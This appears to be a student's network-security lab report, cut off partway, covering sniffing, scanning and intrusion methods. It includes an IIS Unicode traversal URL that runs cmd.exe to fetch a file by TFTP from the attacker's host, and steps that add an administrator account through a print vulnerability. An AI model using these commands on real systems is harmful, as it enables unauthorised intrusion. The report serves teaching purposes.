《网络安全技术》课程考查大作业.docVIP

  • 155
  • 0
  • 约6.03千字
  • 约 12页
  • 2021-11-22 发布于安徽
  • 举报
大连外国语大学软件学院 成绩评定:《网络安全技术》 成绩评定: 专业: 信管(英日) 年级: 13级 班级: 21 班 姓名: 陈君竹 学号: 3号 黑客常用网络侦听、网络扫描、网络入侵方法简介 (1)网络侦听:网络侦听的目的是截获通信的内容。是一种监视网络状态、数据流程以及网络上信息传输的 管理工具,它可以将网络界面设定成监听模式,并且可以截获网络上所传输的信息。监听的手段是对协议进行分析。Sniffer pro就是一个完善的网络监听工具。 监听器Sniffer的原理:在局域网中与其他计算机进行数据交换的时候,发送的数据包发往所有的连在一起的主机,也就是广播,在报头中包含目标机的正确地址。因此只有与数据包中目标地址一致的那台主机才会接收数据包,其他的机器都会将包丢弃。但是,当主机工作在监听模式下时,无论接收到的数据包中目标地址是什么,主机都将其接收下来。然后对数据包进行分析,就得到了局域网中通信的数据。一台计算机可以监听同一网段所有的数据包,不能监听不同网段的计算机传输的信息。 : (2)网络扫描: 分为两种,一种是被动式策略,另一种是主动式策略 网络扫描是确认网络运行的主机的工作程序,或是为了对主机进行攻击,或是为了网络安全评估。网络扫描程序,如Ping扫射和端口扫描,返回关于哪个IP地址映射有主机连接到因特网上的并是工作的,这些主机提供什么样的服务的信息。另一种扫描方法是反向映射,返回关于哪个IP地址上没有映射出活动的主机的信息,这使攻击者能假设出可行的地址。 一种被动式策略就是基于主机之上,对系统中不合适的设置,脆弱的口令以及其他同安全规则抵触的对象进行检查。被动式扫描不会对系统造成破坏,而主动式扫描对系统进行模拟攻击,可能会对系统造成破坏。 主动式策略是基于网络的,它通过执行一些脚本文件模拟对系统进行攻击的行为并记录系统的反应,从而发现其中的漏洞。具体方法有活动主机探测;2、ICMP查询;3、网络PING扫描;4、端口扫描;5、标识UDP和TCP服务;6、指定漏洞扫描;7、综合扫描。 (3)网络入侵:目前常用的网络攻击手段有以下几种: 1.社会工程学攻击: 社交工程是使用计谋和假情报去获得密码和其他敏感信息的科学,研究一个站点的策略其中之一就是尽可能多的了解这个组织的个体,因此黑客不断试图寻找更加精妙的方法从他们希望渗透的组织那里获得信息 2.物理攻击 物理安全是保护一些比较重要的设备不被接触。 物理安全比较难防,因为攻击往往来自能够接触到物理设备的用户。 3.暴力攻击 字典文件为暴力破解提供了一条捷径,程序首先通过扫描得到系统的用户,然后利用字典中每一个密码来登录系统,看是否成功,如果成功则将密码显示 4.利用Unicode漏洞攻击 该方法利用了Unicode本来就有的漏洞进行非法的信息读取,修改操作。可以通过修复漏洞来防范攻击。 5.利用缓冲区溢出漏洞进行攻击等技术 目前最流行的一种攻击技术就是缓冲区溢出攻击。当目标操作系统收到了超过了它的最大能接收的信息量的时候,将发生缓冲区溢出。这些多余的数据将使程序的缓冲区溢出,然后覆盖了实际的程序数据,缓冲区溢出使目标系统的程序被修改,经过这种修改的结果使在系统上产生一个后门。 第一种入侵方法 2.1 方法原理 在地址栏上执行命令,用户的权限比较低,像net等系统管理指令不能执行。利用Unicode可以入侵对方的系统,并得到管理员权限 2.2 入侵过程 进入到tftpd32软件里,输入本机的IP 接着在ie浏览器的地址栏中输入 09/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+tftp+-i+10+get+idq.dll 为了确定是否上传成功, 下一步是入侵到对方电脑,拷贝ispc.exe文件到本地计算机的C盘根目录 并且在DOS界面输入命令(因为有几次操作错误,截图中有多处重复操作的命令) 这时我们可以自己添加一个账户密码了 2.3 入侵结果 入侵结果是为对方系统添加了一个新的账户和密码(都是Hacker123)。 第二种入侵方法 3.1 方法原理 利用打印漏洞可以在目标的计算机上添加一个具有管理员权限的用户。 3.2 入侵过程 首先把该exe执行文件放到指定的目录之下,在DOS界面下,键入cniis 09 0(反复实验三次以后成功) 3.3 入侵结果 利用打印漏洞可以在目标的计算机上添加一个具有管理员权限的用户,入侵成功 第三种入侵方法 4.1 方法原理 用户登录以后,所有的用户信息都存储在系

文档评论(0)

1亿VIP精品文档

相关文档